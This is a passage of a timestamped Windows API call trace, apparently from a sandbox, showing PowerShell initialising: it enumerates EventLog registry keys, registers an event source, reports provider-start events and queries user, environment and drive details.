	[0486.734] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x358) returned 0x0
	[0486.734] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.734] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x35c) returned 0x0
	[0486.734] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.734] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x360) returned 0x0
	[0486.734] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.734] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x364) returned 0x0
	[0486.735] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x368) returned 0x0
	[0486.735] RegCloseKey (hKey=0x368) returned 0x0
	[0486.735] RegCloseKey (hKey=0x344) returned 0x0
	[0486.735] RegCloseKey (hKey=0x364) returned 0x0
	[0486.737] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x364) returned 0x0
	[0486.737] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed1ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed1ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.737] CoTaskMemFree (pv=0x0) 
	[0486.737] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.737] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.737] CoTaskMemFree (pv=0x43c750) 
	[0486.738] CoTaskMemFree (pv=0x0) 
	[0486.738] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.738] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.738] CoTaskMemFree (pv=0x43c750) 
	[0486.738] CoTaskMemFree (pv=0x0) 
	[0486.738] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.738] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.738] CoTaskMemFree (pv=0x43c750) 
	[0486.738] CoTaskMemFree (pv=0x0) 
	[0486.738] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.738] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.738] CoTaskMemFree (pv=0x43c750) 
	[0486.738] CoTaskMemFree (pv=0x0) 
	[0486.738] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.738] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.738] CoTaskMemFree (pv=0x43c750) 
	[0486.738] CoTaskMemFree (pv=0x0) 
	[0486.738] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.738] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.739] CoTaskMemFree (pv=0x43c750) 
	[0486.739] CoTaskMemFree (pv=0x0) 
	[0486.739] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.739] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.739] CoTaskMemFree (pv=0x43c750) 
	[0486.739] CoTaskMemFree (pv=0x0) 
	[0486.739] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.739] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.739] CoTaskMemFree (pv=0x43c750) 
	[0486.739] CoTaskMemFree (pv=0x0) 
	[0486.739] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.739] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x43c750, lpcchName=0x1ed278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.739] CoTaskMemFree (pv=0x43c750) 
	[0486.739] CoTaskMemFree (pv=0x0) 
	[0486.739] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x344) returned 0x0
	[0486.739] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.740] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x368) returned 0x0
	[0486.740] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.740] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x36c) returned 0x0
	[0486.740] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.740] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x370) returned 0x0
	[0486.740] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.740] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x374) returned 0x0
	[0486.740] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.740] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x378) returned 0x0
	[0486.741] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.741] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x37c) returned 0x0
	[0486.741] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.741] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x380) returned 0x0
	[0486.741] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x0) returned 0x2
	[0486.741] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x384) returned 0x0
	[0486.741] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2d8 | out: phkResult=0x1ed2d8*=0x388) returned 0x0
	[0486.741] RegCloseKey (hKey=0x388) returned 0x0
	[0486.742] RegCloseKey (hKey=0x364) returned 0x0
	[0486.742] RegCloseKey (hKey=0x384) returned 0x0
	[0486.749] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba20008
	[0487.115] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3022b30*="WSMan", lpRawData=0x30228a0) returned 1
	[0487.116] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0487.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.117] CoTaskMemFree (pv=0x484300) 
	[0487.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.119] CoTaskMemAlloc (cb=0x804) returned 0x1b84fd80
	[0487.119] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84fd80, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0487.119] CoTaskMemFree (pv=0x1b84fd80) 
	[0487.119] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0487.119] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0487.119] CoTaskMemFree (pv=0x43c750) 
	[0487.120] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3028068*="Alias", lpRawData=0x3027df8) returned 1
	[0487.121] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0487.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.121] CoTaskMemFree (pv=0x484300) 
	[0487.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.122] CoTaskMemAlloc (cb=0x804) returned 0x1b84fd80
	[0487.122] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84fd80, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0487.123] CoTaskMemFree (pv=0x1b84fd80) 
	[0487.123] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0487.123] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0487.123] CoTaskMemFree (pv=0x43c750) 
	[0487.123] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x302d660*="Environment", lpRawData=0x302d3f0) returned 1
	[0487.124] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0487.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.124] CoTaskMemFree (pv=0x484300) 
	[0487.125] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0487.125] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0487.125] CoTaskMemFree (pv=0x484300) 
	[0487.125] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0487.125] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0487.126] CoTaskMemFree (pv=0x484300) 
	[0487.126] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ed110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0487.126] SetErrorMode (uMode=0x1) returned 0x1
	[0487.126] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ed320 | out: lpFileInformation=0x1ed320*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0487.126] SetErrorMode (uMode=0x1) returned 0x1
	[0487.127] GetLogicalDrives () returned 0x4
	[0487.128] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ece80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.128] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0487.129] SetErrorMode (uMode=0x1) returned 0x1
	[0487.129] CoTaskMemAlloc (cb=0x68) returned 0x4a68d0
	[0487.129] CoTaskMemAlloc (cb=0x68) returned 0x4a6860
	[0487.129] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x4a68d0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ed2f0, lpMaximumComponentLength=0x1ed2ec, lpFileSystemFlags=0x1ed2e8, lpFileSystemNameBuffer=0x4a6860, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ed2f0*=0x9c354b42, lpMaximumComponentLength=0x1ed2ec*=0xff, lpFileSystemFlags=0x1ed2e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0487.130] CoTaskMemFree (pv=0x4a68d0) 
	[0487.130] CoTaskMemFree (pv=0x4a6860) 
	[0487.130] SetErrorMode (uMode=0x1) returned 0x1
	[0487.130] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0487.131] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ed030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.131] SetErrorMode (uMode=0x1) returned 0x1
	[0487.131] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed290 | out: lpFileInformation=0x1ed290*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0487.131] SetErrorMode (uMode=0x1) returned 0x1
	[0487.131] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ed030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.131] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0487.132] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.132] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0487.132] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ece60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.132] SetErrorMode (uMode=0x1) returned 0x1
	[0487.132] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed0c0 | out: lpFileInformation=0x1ed0c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0487.132] SetErrorMode (uMode=0x1) returned 0x1
	[0487.132] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ece60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.133] SetErrorMode (uMode=0x1) returned 0x1
	[0487.133] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed0c0 | out: lpFileInformation=0x1ed0c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0487.133] SetErrorMode (uMode=0x1) returned 0x1
	[0487.133] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0487.133] SetErrorMode (uMode=0x1) returned 0x1
	[0487.133] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed160 | out: lpFileInformation=0x1ed160*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0487.133] SetErrorMode (uMode=0x1) returned 0x1
	[0487.133] CoTaskMemAlloc (cb=0x804) returned 0x1b84fd80
	[0487.133] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84fd80, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0487.134] CoTaskMemFree (pv=0x1b84fd80) 
	[0487.134] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0487.134] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0487.135] CoTaskMemFree (pv=0x43c750) 
	[0487.135] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3034750*="FileSystem", lpRawData=0x30344e0) returned 1
	[0487.136] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0487.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.137] CoTaskMemFree (pv=0x484300) 
	[0487.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0487.139] CoTaskMemAlloc (cb=0x804) returned 0x1b84fd80
	[0487.139] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84fd80, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0487.139] CoTaskMemFree (pv=0x1b84fd80) 
	[0487.139] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0487.139] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0487.139] CoTaskMemFree (pv=0x43c750) 
	[0487.140] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3039f90*="Function", lpRawData=0x3039d20) returned 1
	[0487.150] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0487.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.151] CoTaskMemFree (pv=0x484300) 
	[0487.984] CoTaskMemAlloc (cb=0x804) returned 0x1b84fd80
	[0487.984] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84fd80, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0487.985] CoTaskMemFree (pv=0x1b84fd80) 
	[0487.985] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0487.985] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0487.985] CoTaskMemFree (pv=0x43c750) 
	[0487.986] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x305c7b8*="Registry", lpRawData=0x305c548) returned 1
	[0488.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
